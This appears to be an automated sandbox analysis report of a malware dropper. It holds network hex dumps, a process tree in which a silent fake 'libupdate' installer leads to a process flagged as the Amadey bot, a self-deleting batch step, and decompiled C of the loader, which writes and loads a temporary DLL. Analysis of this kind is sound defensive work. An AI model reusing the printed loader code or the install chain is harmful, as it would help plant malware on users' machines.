                                                                  2021-09-30 21:52:29 UTC5712INData Raw: 23 4d da 9e b0 b8 7e a8 b5 ea 8e 3a ff 10 d0 00 c2 25 3a 15 64 44 73 12 6c f9 5c 1b 95 e0 73 53 06 3e 46 2c 7a e1 e7 b6 d2 7a f9 98 e5 6a ac f2 bd d4 72 7c d2 a9 10 f1 98 f6 b5 57 b2 69 39 c8 ee a3 92 f9 d0 e9 e1 4c 12 6c 1d 85 74 94 56 7e c6 c3 7a f3 9b 38 1d 50 69 9d f1 98 be ec 5b e9 85 c7 af e8 7b d6 26 5d 34 01 ab 06 c6 42 5b 05 bb 1a 01 08 ac 69 cd 60 ea 09 6e 34 0a 92 4b c2 3d b6 c2 32 31 b7 1f bc 62 c2 01 57 73 99 ff 75 e0 37 d6 ae d0 f2 f1 87 cd 39 ba 53 56 af b3 8c f3 b3 bd 33 85 a4 cd 70 54 10 80 c0 7d f1 26 60 03 89 55 67 71 e0 2f 04 c6 29 02 3f 7d 98 7b 69 2e ab 27 c8 70 e7 7a 0b 6f 6f 52 68 2c 00 12 d7 81 17 4a 6d 3e 0f dc 93 22 41 cf 33 1c 7f 77 7a 24 16 b4 6b 15 57 98 8c 51 2f f4 ad ce e1 d5 61 a7 fc 15 b0 20 fb d9 b1 75 7a ce 26 0c 10 3b
                                                                  Data Ascii: #M~:%:dDsl\sS>F,zzjr|Wi9LltV~z8Pi[{&]4B[i`n4K=21bWsu79SV3pT}&`Ugq/)?}{i.'pzooRh,Jm>"A3wz$kWQ/a uz&;
                                                                  2021-09-30 21:52:29 UTC5728INData Raw: 0d 86 10 01 8d 73 2e 0d 72 23 fe 21 97 76 58 39 da c2 8a 8a d0 0a 88 6a 66 d2 4e 6e 96 f3 c5 9a 7a fc 24 0e 83 44 fd 4c ad 50 cb 91 72 54 ba 44 6d 94 7a 38 30 65 3c f1 dc 87 fb a6 80 63 e9 e1 ea 4f cb cf e7 ac ff 6a db b2 91 f5 ed 84 73 00 29 1a e0 78 a4 ec 1d 38 09 0f 41 1c cc ea ed d4 c6 c3 18 2e b4 60 87 03 c0 b9 5b 57 df 82 cb ba 55 4b b9 37 7c cd 8e c4 74 7e 84 37 09 d5 c3 f0 e3 33 e1 5b b2 eb b7 b6 f1 a5 b7 a9 d6 70 4f 92 55 61 e0 f9 17 fb 71 bd e9 6a e5 d8 fd 79 86 18 50 94 1d 07 63 5a 69 dd b5 91 7a e3 ea a6 3a ad 91 dd 68 14 5c 51 6e 2d c3 bd e1 a2 b0 75 d8 8c ed 99 92 85 a3 a1 e8 9b 06 00 ef bc b0 ad e0 f5 5c 0b 9a c4 22 99 b5 87 f4 7a e0 ec b3 b6 4e 0e 6b 06 1b f6 c3 dd 33 00 03 b6 a7 2b 75 b3 44 e2 cb 06 b5 d7 e9 6a 3a 5c f5 2a bf 77 18 39 fa
                                                                  Data Ascii: s.r#!vX9jfNnz$DLPrTDmz80e<cOjs)x8A.`[WUK7|t~73[pOUaqjyPcZiz:h\Qn-u\"zNk3+uDj:\*w9
                                                                  2021-09-30 21:52:29 UTC5744INData Raw: 30 10 06 03 55 04 03 13 09 4e 6f 74 65 70 61 64 2b 2b 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 c7 aa 4a 43 3e d2 24 23 13 81 2a e2 49 28 ff bd a3 54 bd 54 c4 fd 3c 76 d6 a5 e3 55 3a c1 bf f4 9e c4 6c 5d 5a 30 9a ec 36 31 7c 4e 9d 35 bf d9 dd 17 1e 0b b7 63 76 a9 7a 0b 6e 55 e1 28 77 2a cc 35 0a cb 35 2a 83 61 6b c3 ca b7 47 31 59 d6 23 2e 65 27 77 b1 f0 82 29 c6 8f f0 cc 99 ed 1e b5 ed e7 34 07 e7 f1 84 7e fd 3f 54 65 21 0e a9 d7 6c c8 f6 d4 66 b1 1d 8d 52 3c eb df 9f 41 61 9d 85 22 a7 67 e1 f4 54 a4 77 83 49 39 cc 9a 40 4a e6 20 c6 be ee d5 9f 95 ca 52 6c c9 80 2b d1 ab 7a f4 59 84 f8 6a 7a 8e 83 ef 17 dd 4c 24 6d 15 18 19 bf 0d bd 9f 97 3e fb 96 fe 9b 5c 68 d1 5d 60 61 1f 7f 52 c8 2e 52 d4 b0 3a
                                                                  Data Ascii: 0UNotepad++0"0*H0JC>$#*I(TT<vU:l]Z061|N5cvznU(w*55*akG1Y#.e'w)4~?Te!lfR<Aa"gTwI9@J Rl+zYjzL$m>\h]`aR.R:


                                                                  Code Manipulations

                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  Analysis Process: Ac372JNTO6.exe PID: 5144 Parent PID: 1400

                                                                  General

                                                                  Start time:23:52:13
                                                                  Start date:30/09/2021
                                                                  Path:C:\Users\user\Desktop\Ac372JNTO6.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\Ac372JNTO6.exe'
                                                                  Imagebase:0x400000
                                                                  File size:1026959 bytes
                                                                  MD5 hash:52EEAFE4196446ECCBADA6DD4C750AA2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: libupdate.exe PID: 4568 Parent PID: 5144

                                                                  General

                                                                  Start time:23:52:29
                                                                  Start date:30/09/2021
                                                                  Path:C:\Program Files (x86)\MouseJiggler\libupdate.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Program Files (x86)\MouseJiggler\libupdate.exe
                                                                  Imagebase:0x400000
                                                                  File size:5886456 bytes
                                                                  MD5 hash:B1210A977CE23D855A58376927C014A6
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Antivirus matches:
                                                                  • Detection: 9%, Metadefender, Browse
                                                                  • Detection: 31%, ReversingLabs
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: libupdate.tmp PID: 6876 Parent PID: 4568

                                                                  General

                                                                  Start time:23:52:31
                                                                  Start date:30/09/2021
                                                                  Path:C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmp
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\AppData\Local\Temp\is-3N4T2.tmp\libupdate.tmp' /SL5='$202B4,5001884,960512,C:\Program Files (x86)\MouseJiggler\libupdate.exe'
                                                                  Imagebase:0x400000
                                                                  File size:3292160 bytes
                                                                  MD5 hash:3433CBC457B534449FF86EDED3253643
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: libupdate.exe PID: 6948 Parent PID: 6876

                                                                  General

                                                                  Start time:23:52:32
                                                                  Start date:30/09/2021
                                                                  Path:C:\Program Files (x86)\MouseJiggler\libupdate.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Program Files (x86)\MouseJiggler\libupdate.exe' /VERYSILENT
                                                                  Imagebase:0x400000
                                                                  File size:5886456 bytes
                                                                  MD5 hash:B1210A977CE23D855A58376927C014A6
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: libupdate.tmp PID: 6668 Parent PID: 6948

                                                                  General

                                                                  Start time:23:52:34
                                                                  Start date:30/09/2021
                                                                  Path:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp' /SL5='$70264,5001884,960512,C:\Program Files (x86)\MouseJiggler\libupdate.exe' /VERYSILENT
                                                                  Imagebase:0x400000
                                                                  File size:3292160 bytes
                                                                  MD5 hash:3433CBC457B534449FF86EDED3253643
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: cmd.exe PID: 6632 Parent PID: 5144

                                                                  General

                                                                  Start time:23:52:36
                                                                  Start date:30/09/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\deldll.bat' '
                                                                  Imagebase:0xd80000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Analysis Process: conhost.exe PID: 6656 Parent PID: 6632

                                                                  General

                                                                  Start time:23:52:36
                                                                  Start date:30/09/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7f20f0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Analysis Process: PING.EXE PID: 5908 Parent PID: 6632

                                                                  General

                                                                  Start time:23:52:36
                                                                  Start date:30/09/2021
                                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                                  Wow64 process (32bit):true
                                                                  Commandline:ping -n 2 -w 1000 127.0.0.1
                                                                  Imagebase:0x870000
                                                                  File size:18944 bytes
                                                                  MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Analysis Process: PING.EXE PID: 1240 Parent PID: 6632

                                                                  General

                                                                  Start time:23:52:38
                                                                  Start date:30/09/2021
                                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                                  Wow64 process (32bit):true
                                                                  Commandline:ping -n 2 -w 1000 127.0.0.1
                                                                  Imagebase:0x7ff70d6e0000
                                                                  File size:18944 bytes
                                                                  MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Analysis Process: sqconfig.exe PID: 5836 Parent PID: 6668

                                                                  General

                                                                  Start time:23:52:38
                                                                  Start date:30/09/2021
                                                                  Path:C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe'
                                                                  Imagebase:0x13c0000
                                                                  File size:6177792 bytes
                                                                  MD5 hash:8B3831A85EAC83E63B4A0DEAA53B8404
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000013.00000002.546644069.0000000003A56000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000013.00000002.546500569.00000000039D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: sqconfig.exe PID: 1688 Parent PID: 3352

                                                                  General

                                                                  Start time:23:53:01
                                                                  Start date:30/09/2021
                                                                  Path:C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe'
                                                                  Imagebase:0x13c0000
                                                                  File size:6177792 bytes
                                                                  MD5 hash:8B3831A85EAC83E63B4A0DEAA53B8404
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language

                                                                  Chronological Activities

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >

                                                                    Analysis Process: Ac372JNTO6.exe PID: 5144 Parent PID: 1400 Ac372JNTO6.exeCOMMON

                                                                    Executed Functions

                                                                    Function 100059A0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 76%
                                                                    			E100059A0(void* __ebp, void* __eflags) {
				intOrPtr* _v8;
				intOrPtr _v274;
				intOrPtr _v275;
				char _v276;
				char _v280;
				signed char _v324;
				struct _WIN32_FIND_DATAA _v332;
				char _v336;
				char _v340;
				CHAR* _v348;
				void* _t24;
				signed char _t31;
				intOrPtr _t35;
				void* _t48;
				intOrPtr* _t49;
				void* _t51;
				void* _t53;
				void* _t54;

				_t53 =  &_v336;
				E10004BF0(__eflags, _t53);
				E100035B0( &_v340, 0x200);
				_push(0x5c);
				_t49 = _v8;
				_push( *_t49);
				_push("%s%c*.*");
				E10004D10( &_v348);
				_t54 = _t53 + 0x10;
				_t24 = FindFirstFileA(_v348,  &_v332); // executed
				_t48 = _t24;
				if(_t48 == 0xffffffff) {
					L11:
					E10003430( &_v336);
					return E10005980(_t49);
				}
				_t51 = FindNextFileA;
				do {
					if(_v276 != 0x2e) {
						L6:
						E10004A80( &_v336);
						_push( &_v280);
						_push(0x5c);
						_push( *_t49);
						_push("%s%c%s");
						E10004D10( &_v340);
						_t31 = _v324;
						_t54 = _t54 + 0x14;
						_t61 = _t31 & 0x00000010;
						if((_t31 & 0x00000010) == 0) {
							E10005AE0( &_v336);
						} else {
							E100059A0(_t51, _t61,  &_v336);
						}
						goto L9;
					}
					_t35 = _v275;
					if(_t35 != 0 && (_t35 != 0x2e || _v274 != 0)) {
						goto L6;
					}
					L9:
				} while (FindNextFileA(_t48,  &(_v332.ftLastAccessTime)) != 0);
				FindClose(_t48);
				goto L11;
			}





















                                                                    0x100059a0
                                                                    0x100059ad
                                                                    0x100059bc
                                                                    0x100059c1
                                                                    0x100059c7
                                                                    0x100059d0
                                                                    0x100059d1
                                                                    0x100059d7
                                                                    0x100059e0
                                                                    0x100059e9
                                                                    0x100059ef
                                                                    0x100059f4
                                                                    0x10005a70
                                                                    0x10005a75
                                                                    0x10005a88
                                                                    0x10005a88
                                                                    0x100059f7
                                                                    0x100059fd
                                                                    0x10005a02
                                                                    0x10005a18
                                                                    0x10005a1d
                                                                    0x10005a28
                                                                    0x10005a29
                                                                    0x10005a2b
                                                                    0x10005a30
                                                                    0x10005a36
                                                                    0x10005a3b
                                                                    0x10005a3f
                                                                    0x10005a42
                                                                    0x10005a44
                                                                    0x10005a57
                                                                    0x10005a46
                                                                    0x10005a4b
                                                                    0x10005a4b
                                                                    0x00000000
                                                                    0x10005a44
                                                                    0x10005a04
                                                                    0x10005a0a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x10005a5c
                                                                    0x10005a64
                                                                    0x10005a69
                                                                    0x00000000

                                                                    APIs
                                                                      • Part of subcall function 10004D10: vsprintf.MSVCRT ref: 10004D34
                                                                    • FindFirstFileA.KERNEL32(0000005C,?,00000200,00000000), ref: 100059E9
                                                                    • FindNextFileA.KERNEL32(00000000,?,?), ref: 10005A62
                                                                    • FindClose.KERNEL32(00000000), ref: 10005A69
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstNextvsprintf
                                                                    • String ID: %s%c%s$%s%c*.*$.
                                                                    • API String ID: 3329218086-3888266457
                                                                    • Opcode ID: fe9b148c403627668117ac8923b46573ac1af3a29b8214059a60aa9b7f080896
                                                                    • Instruction ID: 1065b162a1b9fca1b1ad62252492fc21ac605415f60a94d0c9e05d291c74bad9
                                                                    • Opcode Fuzzy Hash: fe9b148c403627668117ac8923b46573ac1af3a29b8214059a60aa9b7f080896
                                                                    • Instruction Fuzzy Hash: FE21C479104744AAF210DB60CC85EAF77ACDF862D1F408A1DF5914309AE736E5498B67
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004018D0, Relevance: 63.2, APIs: 26, Strings: 10, Instructions: 171stringfilelibraryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 84%
                                                                    			E004018D0() {
				char _v512;
				char _v1024;
				char _v1536;
				char _v1540;
				char _v1560;
				char _v2040;
				char _v2048;
				void* _v2052;
				_Unknown_base(*)()* _v2056;
				char _v2060;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _t28;
				intOrPtr _t29;
				struct HINSTANCE__* _t30;
				struct HINSTANCE__* _t40;
				_Unknown_base(*)()* _t41;
				_Unknown_base(*)()* _t45;
				int _t49;
				void* _t59;
				intOrPtr _t69;
				intOrPtr* _t70;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int _t86;
				struct HINSTANCE__* _t96;
				struct HINSTANCE__* _t98;
				void* _t99;
				void* _t100;

				GetModuleFileNameA(0,  &_v1024, 0x200);
				_t28 =  *0x4020d5; // 0x0
				if(_t28 == 0) {
					L3:
					_t29 =  *0x4020c4; // 0xfab8f
					if(_t29 == 0) {
						L7:
						_t30 = GetModuleHandleA(0);
						_t69 =  *0x4020a8; // 0x4000
						_t72 =  *0x4020cd; // 0x6930
						_t96 = _t30;
						_t31 =  *((intOrPtr*)(_t96 + _t69));
						_t97 = _t96 + _t69;
						_t73 =  *((intOrPtr*)(_t72 + _t96 + _t69));
						if( *((intOrPtr*)(_t96 + _t69)) <= _t73) {
							_t31 = _t73;
						}
						_t70 = E00401C20(_t31 + 0x400);
						if(E004016A0(_t73, _t97, _t70,  &_v2052,  &_v1540) == 0) {
							L15:
							lstrcatA(lstrcpyA( &_v512, "ERROR: "),  &_v1024);
							MessageBoxA(0,  &_v2048,  &_v512, 0x10);
							ExitProcess(0);
						} else {
							_t40 = LoadLibraryA( &_v1536); // executed
							_t98 = _t40;
							if(_t98 != 0) {
								_t41 = GetProcAddress(_t98, "gentee_init");
								_v2052 = GetProcAddress(_t98, "gentee_deinit");
								_v2060 = GetProcAddress(_t98, "gentee_load");
								_v2056 = GetProcAddress(_t98, "gentee_set");
								_t45 = GetProcAddress(_t98, "gentee_call");
								_t86 =  *0x4020c8; // 0x10010204
								 *0x403550 = _t45;
								 *_t41(_t86 & 0x000000ff | 0x00000002, _t100);
								_v2060(4, E00401890);
								if( *_t70 == 0x4547) {
									_t49 = _v2072(_t70, 5);
									E00401C40(_t70);
									_v2076();
									FreeLibrary(_t98);
									FreeLibrary(_t98);
									DeleteFileA( &_v1560);
									ExitProcess(_t49);
								}
								lstrcpyA( &_v2060, "The executable file does not have a bytecode!");
								goto L15;
							}
							wsprintfA( &_v2048, "Cannot load %s.",  &_v1536);
							goto L15;
						}
					}
					_t59 = CreateFileA( &_v1024, 0x80000000, 3, 0, 3, 0, 0); // executed
					_t99 = _t59;
					if( *0x4020c4 <= GetFileSize(_t99, 0)) {
						FindCloseChangeNotification(_t99); // executed
						goto L7;
					}
					lstrcpyA( &_v2048, "The file is corrupted. It was downloaded with errors or otherwise damaged.\nPlease download it again and make sure that you do not have viruses.");
					goto L15;
				}
				wsprintfA( &_v2048, 0x40319c, _t28);
				CreateMutexA(0, 1,  &_v2040);
				if(GetLastError() != 0xb7) {
					goto L3;
				}
				lstrcpyA( &_v2040, "The application has already run.");
				goto L15;
			}
































                                                                    0x004018e8
                                                                    0x004018ee
                                                                    0x004018fb
                                                                    0x0040193e
                                                                    0x0040193e
                                                                    0x00401945
                                                                    0x00401993
                                                                    0x00401995
                                                                    0x0040199b
                                                                    0x004019a1
                                                                    0x004019a7
                                                                    0x004019a9
                                                                    0x004019ac
                                                                    0x004019ae
                                                                    0x004019b3
                                                                    0x004019b5
                                                                    0x004019b5
                                                                    0x004019c2
                                                                    0x004019da
                                                                    0x00401aca
                                                                    0x00401ae6
                                                                    0x00401afd
                                                                    0x00401b05
                                                                    0x004019e0
                                                                    0x004019e8
                                                                    0x004019ee
                                                                    0x004019f2
                                                                    0x00401a1d
                                                                    0x00401a2f
                                                                    0x00401a3b
                                                                    0x00401a47
                                                                    0x00401a4b
                                                                    0x00401a4d
                                                                    0x00401a64
                                                                    0x00401a6d
                                                                    0x00401a76
                                                                    0x00401a82
                                                                    0x00401a99
                                                                    0x00401aa0
                                                                    0x00401aa5
                                                                    0x00401ab0
                                                                    0x00401ab3
                                                                    0x00401abd
                                                                    0x00401ac4
                                                                    0x00401ac4
                                                                    0x00401a8e
                                                                    0x00000000
                                                                    0x00401a8e
                                                                    0x00401a06
                                                                    0x00000000
                                                                    0x00401a08
                                                                    0x004019da
                                                                    0x0040195e
                                                                    0x00401964
                                                                    0x00401975
                                                                    0x0040198d
                                                                    0x00000000
                                                                    0x0040198d
                                                                    0x00401981
                                                                    0x00000000
                                                                    0x00401981
                                                                    0x00401908
                                                                    0x00401916
                                                                    0x00401927
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00401933
                                                                    0x00000000

                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000200,?,?,00000000), ref: 004018E8
                                                                    • wsprintfA.USER32 ref: 00401908
                                                                    • CreateMutexA.KERNEL32(00000000,00000001,?), ref: 00401916
                                                                    • GetLastError.KERNEL32 ref: 0040191C
                                                                    • lstrcpyA.KERNEL32(?,The application has already run.), ref: 00401933
                                                                    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,00000000), ref: 0040195E
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000), ref: 00401969
                                                                    • lstrcpyA.KERNEL32(?,The file is corrupted. It was downloaded with errors or otherwise damaged.Please download it again and make sure that you do not have viruses.,?,?,00000000), ref: 00401981
                                                                    • FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 0040198D
                                                                    • GetModuleHandleA.KERNEL32(00000000,?,?,00000000), ref: 00401995
                                                                    • LoadLibraryA.KERNEL32(?,00000000,00000000,?,?,-00000400,?,?,00000000), ref: 004019E8
                                                                    • wsprintfA.USER32 ref: 00401A06
                                                                    • lstrcpyA.KERNEL32(?,ERROR: ,?,00000000,00000000,?,?,-00000400,?,?,00000000), ref: 00401ADF
                                                                    • lstrcatA.KERNEL32(00000000,?,?,00000000), ref: 00401AE6
                                                                    • MessageBoxA.USER32 ref: 00401AFD
                                                                    • ExitProcess.KERNEL32 ref: 00401B05
                                                                    Strings
                                                                    • gentee_init, xrefs: 00401A17
                                                                    • The file is corrupted. It was downloaded with errors or otherwise damaged.Please download it again and make sure that you do not have viruses., xrefs: 0040197B
                                                                    • ERROR: , xrefs: 00401AD9
                                                                    • gentee_deinit, xrefs: 00401A1F
                                                                    • gentee_load, xrefs: 00401A29
                                                                    • The executable file does not have a bytecode!, xrefs: 00401A88
                                                                    • gentee_call, xrefs: 00401A41
                                                                    • gentee_set, xrefs: 00401A35
                                                                    • Cannot load %s., xrefs: 00401A00
                                                                    • The application has already run., xrefs: 0040192D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.322893653.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.322884038.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.322913999.0000000000402000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.322924635.0000000000403000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.322942646.0000000000404000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Filelstrcpy$CreateModulewsprintf$ChangeCloseErrorExitFindHandleLastLibraryLoadMessageMutexNameNotificationProcessSizelstrcat
                                                                    • String ID: Cannot load %s.$ERROR: $The application has already run.$The executable file does not have a bytecode!$The file is corrupted. It was downloaded with errors or otherwise damaged.Please download it again and make sure that you do not have viruses.$gentee_call$gentee_deinit$gentee_init$gentee_load$gentee_set
                                                                    • API String ID: 45270933-813548115
                                                                    • Opcode ID: 75c1140eaf22f4bbb1cb2a1445d8aadd826d4f0cede038027645ba1c2c6d0f94
                                                                    • Instruction ID: 9a6b1dca81c645f7f4531fc4d6c81cc0b764753a35578a77395dc2e12349a1f0
                                                                    • Opcode Fuzzy Hash: 75c1140eaf22f4bbb1cb2a1445d8aadd826d4f0cede038027645ba1c2c6d0f94
                                                                    • Instruction Fuzzy Hash: 6C517371245305ABD320AF60DE4DFAB3BACAB84701F10493AF705B61E0D7B89505CBA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004016A0, Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 140stringfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004016A0(void* __ecx, CHAR* _a4, intOrPtr _a8, long* _a12, void* _a16) {
				intOrPtr _v0;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v48;
				long _v52;
				intOrPtr _t19;
				intOrPtr _t20;
				long _t33;
				void* _t34;
				int _t37;
				void* _t47;
				intOrPtr _t49;
				intOrPtr _t55;
				long* _t59;
				CHAR* _t63;
				CHAR* _t64;
				struct _SECURITY_ATTRIBUTES* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_t19 =  *0x4020cd; // 0x6930
				_t65 = 0;
				if(_t19 == 0) {
					L7:
					_t59 = _a4;
					goto L8;
				} else {
					E00401C60( &_v40, 0x28);
					_t64 = _a4;
					GetTempPathA(0x200, _t64);
					if( *((char*)(lstrlenA(_t64) + _t64 - 1)) == 0x5c) {
						 *((char*)(lstrlenA(_t64) + _t64 - 1)) = 0;
					}
					_t63 = _a16;
					wsprintfA(_t63, "%s\\genteert.dll", _t64);
					_t68 = _t67 + 0xc;
					_t33 = GetFileAttributesA(_t63); // executed
					if(_t33 != 0xffffffff) {
						goto L7;
					} else {
						while(1) {
							_t34 = CreateFileA(_t63, 0xc0000000, 0, 0, 2, 0, 0); // executed
							_t47 = _t34;
							if(_t47 != 0xffffffff) {
								break;
							}
							if(_t65 != 0) {
								L13:
								lstrcpyA(_t64, "Cannot create gentee.dll!");
								return 0;
							} else {
								lstrcpyA(_t64, "c:\\temp");
								CreateDirectoryA(_t64, _t65);
								_t65 = 1;
								wsprintfA(_t63, "%s\\genteert.dll", _t64);
								_t68 = _t68 + 0xc;
								if(GetFileAttributesA(_t63) == _t47) {
									continue;
								} else {
									goto L7;
								}
							}
							goto L15;
						}
						_t59 = _a12;
						_t66 = _a16;
						E004012B0( &(_t59[1]), _t66,  *_t59,  &_v32);
						_t37 = WriteFile(_t47, _t66,  *_t59,  &_v52, 0); // executed
						if(_t37 == 0 || _v36 !=  *_t59) {
							goto L13;
						} else {
							FindCloseChangeNotification(_t47); // executed
							L8:
							_t20 =  *0x4020ca; // 0x1
							if(_t20 == 0) {
								_t55 =  *0x4020d1; // 0xdec49
								E00401CD0(_a8, _t59, _t55);
								return 1;
							} else {
								_t49 =  *0x4020cd; // 0x6930
								E00401C60( &_v40, 0x28);
								E004012B0(_t59 + _t49 + 4, _v0,  *((intOrPtr*)(_t59 + _t49)),  &_v48);
								return 1;
							}
						}
					}
				}
				L15:
			}
























                                                                    0x004016a0
                                                                    0x004016aa
                                                                    0x004016b0
                                                                    0x00401767
                                                                    0x00401767
                                                                    0x00000000
                                                                    0x004016b6
                                                                    0x004016bd
                                                                    0x004016c2
                                                                    0x004016cc
                                                                    0x004016e0
                                                                    0x004016e5
                                                                    0x004016e5
                                                                    0x004016ea
                                                                    0x004016f5
                                                                    0x004016fb
                                                                    0x004016ff
                                                                    0x00401708
                                                                    0x00000000
                                                                    0x0040170a
                                                                    0x0040170a
                                                                    0x0040171a
                                                                    0x00401720
                                                                    0x00401725
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040172d
                                                                    0x004017f7
                                                                    0x004017fd
                                                                    0x0040180c
                                                                    0x00401733
                                                                    0x00401739
                                                                    0x00401741
                                                                    0x0040174e
                                                                    0x00401753
                                                                    0x00401759
                                                                    0x00401765
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00401765
                                                                    0x00000000
                                                                    0x0040172d
                                                                    0x004017b1
                                                                    0x004017b5
                                                                    0x004017c6
                                                                    0x004017d7
                                                                    0x004017df
                                                                    0x00000000
                                                                    0x004017eb
                                                                    0x004017ec
                                                                    0x0040176b
                                                                    0x0040176b
                                                                    0x00401772
                                                                    0x0040180f
                                                                    0x0040181c
                                                                    0x0040182d
                                                                    0x00401778
                                                                    0x00401778
                                                                    0x00401787
                                                                    0x0040179d
                                                                    0x004017ae
                                                                    0x004017ae
                                                                    0x00401772
                                                                    0x004017df
                                                                    0x00401708
                                                                    0x00000000

                                                                    APIs
                                                                    • GetTempPathA.KERNEL32(00000200,?,?,00000028,7691C740,00000000,?,00000000,?,?,004019D8,00000000,00000000,?,?,-00000400), ref: 004016CC
